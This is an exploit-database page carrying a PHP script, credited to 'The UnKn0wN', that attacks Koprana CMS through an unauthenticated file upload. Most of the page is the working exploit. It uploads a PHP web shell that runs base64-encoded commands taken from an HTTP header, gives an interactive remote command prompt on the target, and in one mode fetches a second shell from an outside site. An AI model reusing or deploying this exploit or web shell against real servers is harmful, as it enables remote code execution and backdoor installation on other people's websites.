Koprana CMS Shell Upload

2012.04.12
Credit: The UnKn0wN
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php //NOTE : - If you are using BHR put this file in \exploits\webapp folder // - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only) /* load exploits/webapp/koprana_upload.php set HOST target set PORT Taget_PORT (default : 80) set MODE (1 for backdoor upload/2 for shell upload) set FILE (save format TXT/SQL) exploit !koprana_upload @ HOST = localhost = Target URL @ PORT = 80 = Target Port @ PATH = / = Web site path @ MODE = 1 = Exploit Mode */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $port,$packet) { if (!($sock = fsockopen($host, $port))) die("\n[-] No response from {$host}:{$port}\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+-----------------------[ The Crazy3D Team ]--------------------------+"; print "\n| Koprana CMS Remote Upload Exploit |"; print "\n| by The UnKn0wN |"; print "\n| Greets to : The Crazy3D members and all Algerian h4x0rs |"; print "\n+---------------------------------------------------------------------+"; print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |"; print "\n+---------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path> <mode>\n"; print "\nExample....: php $argv[0] localhost / 1"; print "\nExample....: php $argv[0] localhost /site/ 2\n"; die(); } $host = $argv[1]; $port = $argv[2]; $path = $argv[3]; $mode = $argv[4]; $shell = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $shell2 = file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell) if($mode == "2") $shell = $shell2; $boundary = "---------".str_replace(".", "", microtime()); $payload = "--{$boundary}\r\n"; $payload .= "Content-Disposition: form-data; name=\"fichier\"; filename=\"sh.php\"\r\n"; $payload .= "Content-Type: application/x-php\r\n\r\n"; $payload .= "".$shell."\n\r\n"; $payload .= "--{$boundary}\r\n"; $payload .= "Content-Disposition: form-data; name=\"execute\"\r\n\r\nexecute\r\n"; $payload .= "--{$boundary}\r\n"; $payload .= "Content-Disposition: form-data; name=\"dossier\"\r\n\r\n./\r\n"; $payload .= "--{$boundary}--\r\n"; $packet = "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: keep-alive\r\n\r\n{$payload}"; http_send($host,$port, $packet); if($mode == "1") { $packet = "GET {$path}sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; if (!($sock = http_send($host,$port, $packet))) die("\n[-] Upload failed!\n"); print "[+]Backdoor was upload!\n[+]Getting the shell...\n"; while(1) { print "\nBHR@{$host}# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host,$port, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } }else print "Go to {$host}{$path}sh.php to check.\n"; ?>

References:

http://www.mediafire.com/?ij9rfpfw6s7uzxf


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top